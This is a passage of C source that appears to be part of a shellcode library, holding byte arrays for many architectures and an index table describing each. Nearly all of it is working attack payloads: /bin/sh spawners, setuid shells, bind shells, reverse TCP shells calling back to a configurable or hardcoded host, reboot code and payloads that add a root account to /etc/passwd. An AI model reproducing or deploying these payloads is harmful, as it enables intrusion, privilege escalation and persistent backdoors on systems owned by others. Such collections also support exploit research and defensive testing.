"\xd4\xd5\x5e\xdb\x90\x5f\xcd\x55\xa7\x46\xa9\x81\xc8\x5f\xc9\x97"
"\x63\x6a\xa9\xdf\x06\x6f\xe2\x47\x44\xda\xe2\xaa\xef\x9f\xe8\xd3"
"\xe9\x9c\xc9\x2a\xd3\x0a\x06\xda\x9d\xbb\xa9\x81\xcc\x5f\xc9\xb8"
"\x63\x52\x69\x55\xb7\x42\x23\x35\x63\x42\xa9\xdf\x03\xd7\x7e\xfa"
"\xec\x9d\x13\x1e\x8c\xd5\x62\xee\x6d\x9e\x5a\xd2\x63\x1e\x2e\x55"
"\x98\x42\x8f\x55\x80\x56\xc9\xd7\x63\xde\x92\xde\xe8\x5e\xa9\xb6"
"\xd4\x01\x13\x28\x88\x08\xab\x26\x6b\x9e\x59\x8e\x80\xae\xa8\xda"
"\xb7\x36\xba\x20\x62\x50\x75\x21\x0f\x3d\x4f\xba\xc6\x3b\x5a\xbb"
"\xc8\x71\x41\xfe\x86\x3b\x56\xfe\x9d\x2d\x47\xac\xc8\x27\x02\xa6"
"\xc8\x71\x63\x9a\xac\x7e\x04\xf8\xc8\x30\x47\xaa\xc8\x32\x4d\xbd"
"\x89\x32\x45\xac\x87\x2b\x52\xfe\xa9\x3a\x4f\xb7\x86\x37\x51\xaa"
"\x9a\x3f\x56\xb1\x9a\x2d\x02\xa7\xc8\x71\x63\x9a\xac\x5e\x22\xde";
/*
"\x33\xc9\x83\xe9\xce\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08"
"\x99\xc6\xb8\x83\xeb\xfc\xe2\xf4\xf4\x71\x82\xb8\x08\x99\x4d\xfd"
"\x34\x12\xba\xbd\x70\x98\x29\x33\x47\x81\x4d\xe7\x28\x98\x2d\xf1"
"\x83\xad\x4d\xb9\xe6\xa8\x06\x21\xa4\x1d\x06\xcc\x0f\x58\x0c\xb5"
"\x09\x5b\x2d\x4c\x33\xcd\xe2\xbc\x7d\x7c\x4d\xe7\x2c\x98\x2d\xde"
"\x83\x95\x8d\x33\x57\x85\xc7\x53\x83\x85\x4d\xb9\xe3\x10\x9a\x9c"
"\x0c\x5a\xf7\x78\x6c\x12\x86\x88\x8d\x59\xbe\xb4\x83\xd9\xca\x33"
"\x78\x85\x6b\x33\x60\x91\x2d\xb1\x83\x19\x76\xb8\x08\x99\x4d\xd0"
"\x34\xc6\xf7\x4e\x68\xcf\x4f\x40\x8b\x59\xbd\xe8\x60\x69\x4c\xbc"
"\x57\xf1\x5e\x46\x82\x97\x91\x47\xef\xfa\xab\xdc\x26\xfc\xbe\xdd"
"\x28\xb6\xa5\x98\x66\xfc\xb2\x98\x7d\xea\xa3\xca\x28\xe1\xe6\xc1"
"\x28\xb6\x87\xfc\x4c\xb9\xe0\x9e\x28\xf7\xa3\xcc\x28\xf5\xa9\xdb"
"\x69\xf5\xa1\xca\x67\xec\xb6\x98\x49\xfd\xab\xd1\x66\xf0\xb5\xcc"
"\x7a\xf8\xb2\xd7\x7a\xea\xe6\xc0\x28\xb6\x87\xfc\x4c\x99\xc6\xb8";
*/
unsigned char x86_w32_cmd_exit[] =
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa8"
"\x2a\x6e\x63\x83\xeb\xfc\xe2\xf4\x54\xc2\x2a\x63\xa8\x2a\xe5\x26"
"\x94\xa1\x12\x66\xd0\x2b\x81\xe8\xe7\x32\xe5\x3c\x88\x2b\x85\x2a"
"\x23\x1e\xe5\x62\x46\x1b\xae\xfa\x04\xae\xae\x17\xaf\xeb\xa4\x6e"
"\xa9\xe8\x85\x97\x93\x7e\x4a\x67\xdd\xcf\xe5\x3c\x8c\x2b\x85\x05"
"\x23\x26\x25\xe8\xf7\x36\x6f\x88\x23\x36\xe5\x62\x43\xa3\x32\x47"
"\xac\xe9\x5f\xa3\xcc\xa1\x2e\x53\x2d\xea\x16\x6f\x23\x6a\x62\xe8"
"\xd8\x36\xc3\xe8\xc0\x22\x85\x6a\x23\xaa\xde\x63\xa8\x2a\xe5\x0b"
"\x94\x75\x5f\x95\xc8\x7c\xe7\x9b\x2b\xea\x15\x33\xc0\xc5\xa0\x83"
"\xc8\x42\xf6\x9d\x22\x24\x39\x9c\x4f\x49\x03\x07\x86\x4f\x16\x06"
"\xa8\x2a\x6e\x63";
unsigned char sparc_linux_bind4444[] =
"\x23\x2d\x57\xbb\xa2\x14\x63\xd5\x20\xbf\xff\xff\x20\xbf\xff\xff"
"\x7f\xff\xff\xff\xea\x03\xe0\x20\xaa\x9d\x40\x11\xea\x23\xe0\x20"
"\xa2\x04\x40\x15\x81\xdb\xe0\x20\x12\xbf\xff\xfb\x9e\x03\xe0\x04"
"\x29\x75\x4f\xd2\xf1\x9a\xaf\xde\x61\x8a\x8f\xdf\x61\x89\x70\x2b"
"\xb1\xed\x30\x2b\xf1\xd1\xf0\x37\x60\x35\xaf\xcb\x06\x29\x8f\x1d"
"\x97\x99\xf0\xb1\x3c\x3a\x50\x91\x9a\x2d\xb0\xc1\x32\x6e\x0f\x15"
"\x54\x4a\xcf\x2d\xb1\xad\x30\x49\x69\xb8\x10\x0d\xc3\xdf\x12\xb8"
"\xfb\xe4\x2d\x22\x6c\x0b\x72\xa0\x1d\xfb\x52\xb4\xbf\xeb\xb2\xb5"
"\x22\x28\x0d\x4d\x32\x3f\x52\xa9\xa3\xef\xb2\xa1\x04\x2c\x0d\x39"
"\x44\x10\xcd\x45\xd4\x47\x12\xb0\x45\xb7\x72\xaa\xb6\x14\xcd\x3e"
"\xa4\x4b\x12\xbd\x5a\xc9\x32\xc0\xd9\x1d\x92\x98\x4c\xcd\xf3\x0c"
"\x7c\x52\x0c\xd1\x51\xae\x4c\xdd\xc5\xab\x73\x16\xc4\xc7\xab\xb2"
"\xa6\xcc\x6a\xac\x85\xe7\xb1\xea\x59\xdb\xea\x1a\xc8\x38\x4a\x12"
"\x0c\x04\x35\xd2\x1c\x58\xf5\xea\x5c\xbc\xb5\xf6\xde\xd2\xea\x3d"
"\x4f\x02\xca\x49\x70\xa3\x0a\x49";
unsigned char x86_bsd_suidsh[] =
"\x31\xc0\x50\x50\xb0\x17\xcd\x80" // setuid
"\x31\xc0\x50\x68"
"//sh\x68/bin"
"\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80";
unsigned char x86_netbsd_binsh[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
unsigned char x86_osx_binsh[] =
"\x31\xdb\x6a\x3b\x58\x53\xeb\x18\x5f"
"\x57\x53\x54\x54\x57\x6a\xff\x88\x5f"
"\x07\x89\x5f\xf5\x88\x5f\xfa\x9a\xff"
"\xff\xff\xff\x2b\xff\xe8\xe3\xff\xff"
"\xff/bin/shX";
unsigned char x86_osx_binsh2[] =
"\x99\x52\x68\x2f\x2f\x73\x68\x68"
"\x2f\x62\x69\x6e\x89\xe3\x52\x54"
"\x54\x53\x53\x8d\x42\x3b\xcd\x80";
unsigned char x86_osx_bind4444[] =
"\x33\xc9\x83\xe9\xea\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc5"
"\x7e\x85\xb4\x83\xeb\xfc\xe2\xf4\xaf\x3c\xdd\x79\x45\x14\xe4\xec"
"\x5c\x2c\xed\xa4\xc7\x6f\xd9\x3d\x24\x2c\xc7\xe6\x87\x2c\xef\xa4"
"\x08\xfe\x1c\x27\x94\x2d\xd7\xde\xad\x26\x48\x34\x75\x14\x48\x34"
"\x97\x2d\xd7\x04\xdb\xb3\x05\x23\xaf\x7c\xdc\xde\x9f\x26\xd4\xe3"
"\x94\xb3\x05\xfd\xca\xf7\x74\x4b\x3a\x81\xd5\xdc\xea\x51\xf6\xdc"
"\xad\x51\xe7\xdd\xab\xf7\x66\xe4\x91\x2a\xd6\xe7\x75\x45\x48\x34";
char x86_linux_binsh3[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/bin/sh";
unsigned char x86_solaris_bind4444[] =
"\x31\xc9\x83\xe9\xe8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3f"
"\x08\x0b\x8d\x83\xeb\xfc\xe2\xf4\x87\xf7\xf3\x72\x03\xff\xdb\xdd"
"\x0e\xc8\xbb\x17\x6f\x81\xee\xbc\xf6\x59\x4a\xcc\x6e\x59\xbb\x6b"
"\xc0\xdd\x3a\x5f\xb6\xcf\x59\xeb\x57\x19\x57\xeb\x6e\x81\xed\xe7"
"\x2f\x5e\x5c\x3d\xd7\xf7\xde\x3d\xd6\xf7\xde\xdd\x6f\x5f\xbb\x67"
"\xc0\xdd\x3a\x5f\x8d\x01\x5a\xdf\x6f\xb8\x35\x72\xea\x41\x72\x7f"
"\x6f\x60\x24\xa2\x4c\x60\x63\xa2\x5d\x61\x65\x04\xdc\x58\x58\x04"
"\xdd\x58\x59\xde\x8f\x33\xf4\x58";
char arm_linux_thumb[] =
"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x0c\x30\xc0\x46\x01\x90"
"\x49\x1a\x92\x1a\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68";
char arm_linux_binsh[] =
"\x02\x20\x42\xe0\x1c\x30\x8f\xe2\x04\x30\x8d\xe5"
"\x08\x20\x8d\xe5\x13\x02\xa0\xe1\x07\x20\xc3\xe5\x04\x30\x8f\xe2"
"\x04\x10\x8d\xe2\x01\x20\xc3\xe5\x0b\x0b\x90\xef/bin/sh";
char arm_linux_suidsh[]=
"\x02\x20\x42\xe0\x04\x10\x8f\xe2\x12\x02\xa0\xe1\x01\x20\xc1\xe5\x17\x0b\x90\xef"
"\x02\x20\x42\xe0\x1c\x30\x8f\xe2\x04\x30\x8d\xe5" // shellcode
"\x08\x20\x8d\xe5\x13\x02\xa0\xe1\x07\x20\xc3\xe5\x04\x30\x8f\xe2"
"\x04\x10\x8d\xe2\x01\x20\xc3\xe5\x0b\x0b\x90\xef/bin/sh";
char x86_openbsd_binsh[] =
"\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x54"
"\x53\x53\x6a\x3b\x58\xcd\x80";
long x86_openbsd_bind6969[]= {
0x4151c931,0x51514151,0x61b0c031,0x078980cd,0x4f88c931,0x0547c604,0x084f8902,
0x0647c766,0x106a391b,0x5004478d,0x5050078b,0x68b0c031,0x016a80cd,0x5050078b,
0x6ab0c031,0xc93180cd,0x078b5151,0xc0315050,0x80cd1eb0,0xc9310789,0x50078b51,
0xb0c03150,0x4180cd5a,0x7503f983,0x5b23ebef,0xc9311f89,0x89074b88,0x8d51044f,
0x078b5007,0xc0315050,0x80cd3bb0,0x5151c931,0x01b0c031,0xd8e880cd,0x2fffffff,
0x2f6e6962,0x90416873 };
unsigned char arm_linux_setuid[]=
"\x02\x20\x42\xe0\x04\x10\x8f\xe2\x12\x02\xa0\xe1\x01\x20\xc1\xe5\x17\x0b\x90\xef";
unsigned long armle_osx_reverse[]= {
0xe3a00002, 0xe3a01001, 0xe3a02006, 0xe3a0c061, 0xef000080, 0xe1a0a000, 0xeb000001,
0x5c110200, //# port 4444
0x8700a8c0, //# host 192.168.0.135
0xe1a0000a, 0xe1a0100e, 0xe3a02010, 0xe3a0c062, 0xef000080,
0xe3a05002, 0xe3a0c05a, 0xe1a0000a, 0xe1a01005, 0xef000080,
0xe2455001, 0xe3550000, 0xaafffff8, 0xe3a00000, 0xe3a01001,
0xe3a0c07e, 0xef000080, 0xe0455005, 0xe1a0600d, 0xe24dd020,
0xe28f0014, 0xe4860000, 0xe5865004, 0xe1a01006, 0xe3a02000,
0xe3a0c03b, 0xef000080,
//# /bin/sh
0x6e69622f, 0x0068732f };
unsigned char x64_linux_binsh[] =
"\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53"
"\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b"
"\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05";
unsigned char x86_freebsd_reboot[] =
"\x31\xc0\x50\xb0\x37\xcd\x80";
unsigned char x86_freebsd_reverse[] =
"\xeb\x68\x5e\x31\xc0\x31\xdb\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x53\xb0\x61"
"\xcd\x80\x89\xc2\xc6\x46\x01\x02\x66\xc7\x46\x02\x69\x7a\xb3\x10\x53\x8d\x1e"
"\x53\x50\x50\xb0\x62\xcd\x80\x31\xdb\x53\x52\xb0\x5a\x50\xcd\x80\xfe\xc3\x53"
"\x52\xb0\x5a\x50\xcd\x80\xfe\xc3\x53\x52\xb0\x5a\x50\xcd\x80\x31\xdb\x53\x8d"
"\x7e\x0f\x31\xc0\x31\xc9\xb1\x09\xf3\xaa\x8d\x5e\x08\x89\x5e\x10\x8d\x4e\x10"
"\x51\x53\x50\xb0\x3b\xcd\x80\xb0\x01\xcd\x80\xe8\x93\xff\xff\xff\x41\x42\x43"
"\x43\x7f\x00\x00\x01\x2f\x62\x69\x6e\x2f\x73\x68";
unsigned char x86_bsdlinux_binsh[] = // by dymitrii
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50"
"\x8c\xe0\x21\xc0\x74\x04\xb0\x3b\xeb\x07\xb0\x0b\x99\x52\x53\x89\xe1\xcd\x80";
char x86_solaris_binsh[] =
"\xeb\x33\x5e\x8d\x06\x29\xc9\x89\xf3\x89\x5e\x08\xb1\x07\x80\x03\x20"
"\x43"
"\xe0\xfa"
"\x93"
"\x29\xc0"
"\x89\x5e\x0b"
"\x29\xd2"
"\x88\x56\x19"
"\x89\x56\x07"
"\x89\x56\x0f"
"\x89\x56\x14"
"\xb0\x3b"
"\x8d\x4e\x0b"
"\x89\xca"
"\x52"
"\x51"
"\x53"
"\x50"
"\xeb\x18"
"\xe8\xc8\xff\xff\xff"
"\x0f\x42\x49\x4e\x0f\x53\x48"
"\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03"
"\x9a\x04\x04\x04\x04\x07\x04";
unsigned char x86_solaris_binshu[] =
"\xeb\x33\x5e\x8d\x06\x29\xc9\x89\xf3\x89\x5e\x08\xb1\x07\x80\x03\x20\x43\xe0\xfa"
"\x93\x29\xc0\x89\x5e\x0b\x29\xd2\x88\x56\x19\x89\x56\x07\x89\x56\x0f\x89\x56\x14"
"\xb0\x3b\x8d\x4e\x0b\x89\xca\x52\x51\x53\x50\xeb\x18\xe8\xc8\xff\xff\xff"
"\x0f\x42\x49\x4e\x0f\x53\x48" /* /bin/sh -= 0x20 */
"\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
unsigned char ppc_osx_binsh0[] =
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7d\x68\x02\xa6\x3b\xeb\x01\x71\x39\x40\x01\x71"
"\x39\x1f\xfe\xce\x7c\xa8\x29\xae\x38\x7f\xfe\xc7\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x38\x81\xff\xf8\x38\x0a\xfe\xca\x44\xff\xff\x02\x60\x60\x60\x60\x38\x0a\xfe\x90"
"\x44\xff\xff\x02\x2f\x62\x69\x6e\x2f\x73\x68\x54";
unsigned char ppc_osx_reboot[] =
"\x7c\x63\x1a\x79\x39\x40\x01\x70\x38\x0a\xfe\xb4\x44\xff\xff\x02\x60\x60\x60\x60"
"\x38\x0a\xfe\xc7\x44\xff\xff\x02";
unsigned char ppc_osx_adduser[] =
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7d\x48\x02\xa6\x3b\xea\x01\x70"
"\x39\x60\x01\x70\x39\x1f\xff\x0d\x7c\xa8\x29\xae\x38\x7f\xff\x04"
"\x38\x80\x02\x01\x38\xa0\xff\xff\x38\x0b\xfe\x95\x44\xff\xff\x02"
"\x60\x60\x60\x60\x38\x9f\xff\x0e\x38\xab\xfe\xe5\x38\x0b\xfe\x94"
"\x44\xff\xff\x02\x60\x60\x60\x60\x38\x0b\xfe\x96\x44\xff\xff\x02"
"\x60\x60\x60\x60\x7c\xa5\x2a\x79\x38\x7f\xff\x04\x90\x61\xff\xf8"
"\x90\xa1\xff\xfc\x38\x81\xff\xf8\x38\x0b\xfe\xcb\x44\xff\xff\x02"
"\x60\x60\x60\x60\x38\x0b\xfe\x91\x44\xff\xff\x02\x2f\x74\x6d\x70"
"\x2f\x78\x2e\x73\x68\x58\x23\x21\x2f\x62\x69\x6e\x2f\x73\x68\x0a"
"\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x27\x72\x30\x30\x74\x3a"
"\x3a\x39\x39\x39\x3a\x38\x30\x3a\x3a\x30\x3a\x30\x3a\x72\x30\x30"
"\x74\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x27\x20\x7c\x20\x2f"
"\x75\x73\x72\x2f\x62\x69\x6e\x2f\x6e\x69\x6c\x6f\x61\x64\x20\x2d"
"\x6d\x20\x70\x61\x73\x73\x77\x64\x20\x2e\x0a";
long ppc_bsd_binsh[] = { /* Palante's BSD PPC shellcode w/ NULL*/
0x7cc63278, 0x2f867fff, 0x41bc005c, 0x7c6802a6,
0xb0c3fff9, 0xb0c3fff1, 0x38867ff0, 0x38a67ff4,
0x38e67ff3, 0x7ca52278, 0x7ce72278, 0x7c853a14,
0x7cc419ae, 0x7c8429d6, 0x7c842214, 0x7c043a14,
0x7ce72850, 0x7c852a14, 0x7c63212e, 0x7c832214,
0x7cc5212e, 0x7ca52a78, 0x44ffff02, 0x7ce03b78,
0x44ffff02, 0x4bffffa9, 0x2f62696e, 0x2f73685a,
0xffffffff, 0xffffffff
};
/*
* 203 byte StrongARM/Linux bind() portshell shellcode
* funkysh
*/
char arm_linux_bind[] =
"\x20\x60\x8f\xe2" /* add r6, pc, #32 */
"\x07\x70\x47\xe0" /* sub r7, r7, r7 */
"\x01\x70\xc6\xe5" /* strb r7, [r6, #1] */
"\x01\x30\x87\xe2" /* add r3, r7, #1 */
"\x13\x07\xa0\xe1" /* mov r0, r3, lsl r7 */
"\x01\x20\x83\xe2" /* add r2, r3, #1 */
"\x07\x40\xa0\xe1" /* mov r4, r7 */
"\x0e\xe0\x4e\xe0" /* sub lr, lr, lr */
"\x1c\x40\x2d\xe9" /* stmfd sp!, {r2-r4, lr} */
"\x0d\x10\xa0\xe1" /* mov r1, sp */
"\x66\xff\x90\xef" /* swi 0x90ff66 (socket) */
"\x10\x57\xa0\xe1" /* mov r5, r0, lsl r7 */
"\x35\x70\xc6\xe5" /* strb r7, [r6, #53] */
"\x14\x20\xa0\xe3" /* mov r2, #20 */
"\x82\x28\xa9\xe1" /* mov r2, r2, lsl #17 */
"\x02\x20\x82\xe2" /* add r2, r2, #2 */
"\x14\x40\x2d\xe9" /* stmfd sp!, {r2,r4, lr} */
"\x10\x30\xa0\xe3" /* mov r3, #16 */
"\x0d\x20\xa0\xe1" /* mov r2, sp */
"\x0d\x40\x2d\xe9" /* stmfd sp!, {r0, r2, r3, lr} */
"\x02\x20\xa0\xe3" /* mov r2, #2 */
"\x12\x07\xa0\xe1" /* mov r0, r2, lsl r7 */
"\x0d\x10\xa0\xe1" /* mov r1, sp */
"\x66\xff\x90\xef" /* swi 0x90ff66 (bind) */
"\x45\x70\xc6\xe5" /* strb r7, [r6, #69] */
"\x02\x20\x82\xe2" /* add r2, r2, #2 */
"\x12\x07\xa0\xe1" /* mov r0, r2, lsl r7 */
"\x66\xff\x90\xef" /* swi 0x90ff66 (listen) */
"\x5d\x70\xc6\xe5" /* strb r7, [r6, #93] */
"\x01\x20\x82\xe2" /* add r2, r2, #1 */
"\x12\x07\xa0\xe1" /* mov r0, r2, lsl r7 */
"\x04\x70\x8d\xe5" /* str r7, [sp, #4] */
"\x08\x70\x8d\xe5" /* str r7, [sp, #8] */
"\x66\xff\x90\xef" /* swi 0x90ff66 (accept) */
"\x10\x57\xa0\xe1" /* mov r5, r0, lsl r7 */
"\x02\x10\xa0\xe3" /* mov r1, #2 */
"\x71\x70\xc6\xe5" /* strb r7, [r6, #113] */
"\x15\x07\xa0\xe1" /* mov r0, r5, lsl r7 <dup2> */
"\x3f\xff\x90\xef" /* swi 0x90ff3f (dup2) */
"\x01\x10\x51\xe2" /* subs r1, r1, #1 */
"\xfb\xff\xff\x5a" /* bpl <dup2> */
"\x99\x70\xc6\xe5" /* strb r7, [r6, #153] */
"\x14\x30\x8f\xe2" /* add r3, pc, #20 */
"\x04\x30\x8d\xe5" /* str r3, [sp, #4] */
"\x04\x10\x8d\xe2" /* add r1, sp, #4 */
"\x02\x20\x42\xe0" /* sub r2, r2, r2 */
"\x13\x02\xa0\xe1" /* mov r0, r3, lsl r2 */
"\x08\x20\x8d\xe5" /* str r2, [sp, #8] */
"\x0b\xff\x90\xef" /* swi 0x900ff0b (execve) */
"/bin/sh";
char x86_ppc_linux_binsh[] =
//
// These four bytes work out to the following instruction
// in ppc arch: "rlwnm r16,r28,r29,13,4", which will
// basically do nothing on osx/ppc.
//
// However on x86 architecture the four bytes are 3
// instructions:
//
// "push/nop/jmp"
//
// In this way, execution will be taken to the x86 shellcode
// on an x86 machine, and the ppc shellcode when running
// on a ppc architecture machine.
//
"\x5f\x90\xeb\x48"
"\x69\x69\x69\x69" /*nop*/
"\x69\x69\x69\x69" /*nop*/
"\x69\x69\x69\x69" /*nop*/
// linux/ppc execve /bin/sh by Charles Stevenson (core) <core@bokeoa.com>
"\x7c\x3f\x0b\x78" /*mr r31,r1 # optional instruction */
"\x7c\xa5\x2a\x79" /*xor. r5,r5,r5*/
"\x42\x40\xff\xf9" /*bdzl+ 10000454<main>*/
"\x7f\x08\x02\xa6" /*mflr r24*/
"\x3b\x18\x01\x34" /*addi r24,r24,308*/
"\x98\xb8\xfe\xfb" /*stb r5,-261(r24)*/
"\x38\x78\xfe\xf4" /*addi r3,r24,-268*/
"\x90\x61\xff\xf8" /*stw r3,-8(r1)*/
"\x38\x81\xff\xf8" /*addi r4,r1,-8*/
"\x90\xa1\xff\xfc" /*stw r5,-4(r1)*/
"\x3b\xc0\x01\x60" /*li r30,352*/
"\x7f\xc0\x2e\x70" /*srawi r0,r30,5*/
"\x44\xde\xad\xf2" /*.long 0x44deadf2*/
"/bin/shZ" // the last byte becomes NULL
// lnx_binsh4.c - v1 - 23 Byte /bin/sh sysenter Opcode Array Payload
// Copyright(c) 2005 c0ntex <c0ntex@open-security.org>
// Copyright(c) 2005 BaCkSpAcE <sinisa86@gmail.com>
"\x6a\x0b\x58\x99\x52\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x54"
"\x5b\x52\x53\x54\x59\x0f\x34";
char x86_ppc_osx_binsh[] =
//
// These four bytes work out to the following instruction
// in ppc arch: "rlwnm r16,r28,r29,13,4", which will
// basically do nothing on osx/ppc.
//
// However on x86 architecture the four bytes are 3
// instructions:
//
// "push/nop/jmp"
//
// In this way, execution will be taken to the x86 shellcode
// on an x86 machine, and the ppc shellcode when running
// on a ppc architecture machine.
//
"\x5f\x90\xeb\x48"
// ppc execve() code by b-r00t
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd"
"\x7d\x68\x02\xa6\x3b\xeb\x01\x70"
"\x39\x40\x01\x70\x39\x1f\xfe\xcf"
"\x7c\xa8\x29\xae\x38\x7f\xfe\xc8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x38\x81\xff\xf8\x38\x0a\xfe\xcb"
"\x44\xff\xff\x02\x7c\xa3\x2b\x78"
"\x38\x0a\xfe\x91\x44\xff\xff\x02"
"\x2f\x62\x69\x6e\x2f\x73\x68\x58"
// osx86 execve() code by nemo
"\x31\xdb\x6a\x3b\x58\x53\xeb\x18\x5f"
"\x57\x53\x54\x54\x57\x6a\xff\x88\x5f"
"\x07\x89\x5f\xf5\x88\x5f\xfa\x9a\xff"
"\xff\xff\xff\x2b\xff\xe8\xe3\xff\xff"
"\xff"
"/bin/shX";
/* by Jonathan Salwan
* http://shell-storm.org/shellcode/files/shellcode-735.php
*/
char arm_linux_adduser[] =
/* Thumb mode */
"\x05\x50\x45\xe0" /* sub r5, r5, r5 */
"\x01\x50\x8f\xe2" /* add r5, pc, #1 */
"\x15\xff\x2f\xe1" /* bx r5 */
/* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND, 0644) = fd */
"\x78\x46" /* mov r0, pc */
"\x7c\x30" /* adds r0, #124 */
"\xff\x21" /* movs r1, #255 */
"\xff\x31" /* adds r1, #255 */
"\xff\x31" /* adds r1, #255 */
"\xff\x31" /* adds r1, #255 */
"\x45\x31" /* adds r1, #69 */
"\xdc\x22" /* movs r2, #220 */
"\xc8\x32" /* adds r2, #200 */
"\x05\x27" /* movs r7, #5 */
"\x01\xdf" /* svc 1 */
/* r8 = fd */
"\x80\x46" /* mov r8, r0 */
/* write(fd, "shell-storm:$1$KQYl/yru$PMt02zUTW"..., 72) */
"\x41\x46" /* mov r1, r8 */
"\x08\x1c" /* adds r0, r1, #0 */
"\x79\x46" /* mov r1, pc */
"\x18\x31" /* adds r1, #24 */
"\xc0\x46" /* nop (mov r8, r8) */
"\x48\x22" /* movs r2, #72 */
"\x04\x27" /* movs r7, #4 */
"\x01\xdf" /* svc 1 */
/* close(fd) */
"\x41\x46" /* mov r1, r8 */
"\x08\x1c" /* adds r0, r1, #0 */
"\x06\x27" /* movs r7, #6 */
"\x01\xdf" /* svc 1 */
/* exit(0) */
"\x1a\x49" /* subs r1, r1, r1 */
"\x08\x1c" /* adds r0, r1, #0 */
"\x01\x27" /* movs r7, #1 */
"\x01\xdf" /* svc 1 */
/* shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bash\n */
"\x73\x68\x65\x6c\x6c\x2d\x73\x74\x6f\x72"
"\x6d\x3a\x24\x31\x24\x4b\x51\x59\x6c\x2f"
"\x79\x72\x75\x24\x50\x4d\x74\x30\x32\x7a"
"\x55\x54\x57\x6d\x4d\x76\x50\x57\x63\x55"
"\x34\x6f\x51\x4c\x73\x2f\x3a\x30\x3a\x30"
"\x3a\x72\x6f\x6f\x74\x3a\x2f\x72\x6f\x6f"
"\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73"
"\x68\x0a"
/* /etc/passwd */
"\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
/* by Dustin Schultz
* http://shell-storm.org/shellcode/files/shellcode-736.php
*/
char x64_osx_suidsh[] =
"\x41\xb0\x02\x49\xc1\xe0\x18\x49\x83\xc8\x17\x31\xff\x4c\x89\xc0"
"\x0f\x05\xeb\x12\x5f\x49\x83\xc0\x24\x4c\x89\xc0\x48\x31\xd2\x52"
"\x57\x48\x89\xe6\x0f\x05\xe8\xe9\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x2f\x73\x68";
/* OSX reverse tcp shell (131 bytes)
* replace FFFFFFFF around byte 43 with the call back ip in hex
* replace 5C11 around byte 39 with a new port current is 4444
* http://hammackj.com/2011/04/28/osx-x64-reverse-tcp-shellcode/
*/
char x64_osx_reverse_tcp[] =
"\x41\xb0\x02\x49\xc1\xe0\x18\x49\x83\xc8\x61\x4c\x89\xc0\x48"
"\x31\xd2\x48\x89\xd6\x48\xff\xc6\x48\x89\xf7\x48\xff\xc7\x0f"
"\x05\x49\x89\xc4\x49\xbd\x01\x01\x11\x5c\xff\xff\xff\xff\x41"
"\xb1\xff\x4d\x29\xcd\x41\x55\x49\x89\xe5\x49\xff\xc0\x4c\x89"
"\xc0\x4c\x89\xe7\x4c\x89\xee\x48\x83\xc2\x10\x0f\x05\x49\x83"
"\xe8\x08\x48\x31\xf6\x4c\x89\xc0\x4c\x89\xe7\x0f\x05\x48\x83"
"\xfe\x02\x48\xff\xc6\x76\xef\x49\x83\xe8\x1f\x4c\x89\xc0\x48"
"\x31\xd2\x49\xbd\xff\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xed"
"\x08\x41\x55\x48\x89\xe7\x48\x31\xf6\x0f\x05";
#define ENTRY(a,b,c,x,y,z) { .name=x, .desc=z, .data=(unsigned char *)&y, .len=sizeof(y)-1, \
.cmd=a, .host=b, .port=c },
#define ENTRY_NULL() { NULL, NULL, NULL, 0 }
struct shellcode_t shellcodes[] = {
ENTRY(0,0,0,"arm.linux.adduser", arm_linux_adduser, "Adds root user 'shell-storm' with password 'toor'" )
ENTRY(0,0,0,"arm.linux.binsh", arm_linux_binsh, "Runs /bin/sh" )
ENTRY(0,0,0,"arm.linux.thumb", arm_linux_thumb, "Runs /bin/sh using thumb mode trick" )
ENTRY(0,0,0,"arm.linux.suidsh", arm_linux_suidsh, "Setuid and runs /bin/sh" )
ENTRY(0,0,0,"arm.linux.bind", arm_linux_bind, "Binds /bin/sh to a tcp port" )
ENTRY(0,0,30,"armle.osx.reverse", armle_osx_reverse, "iPhone reverse connect shell to HOST and PORT" )
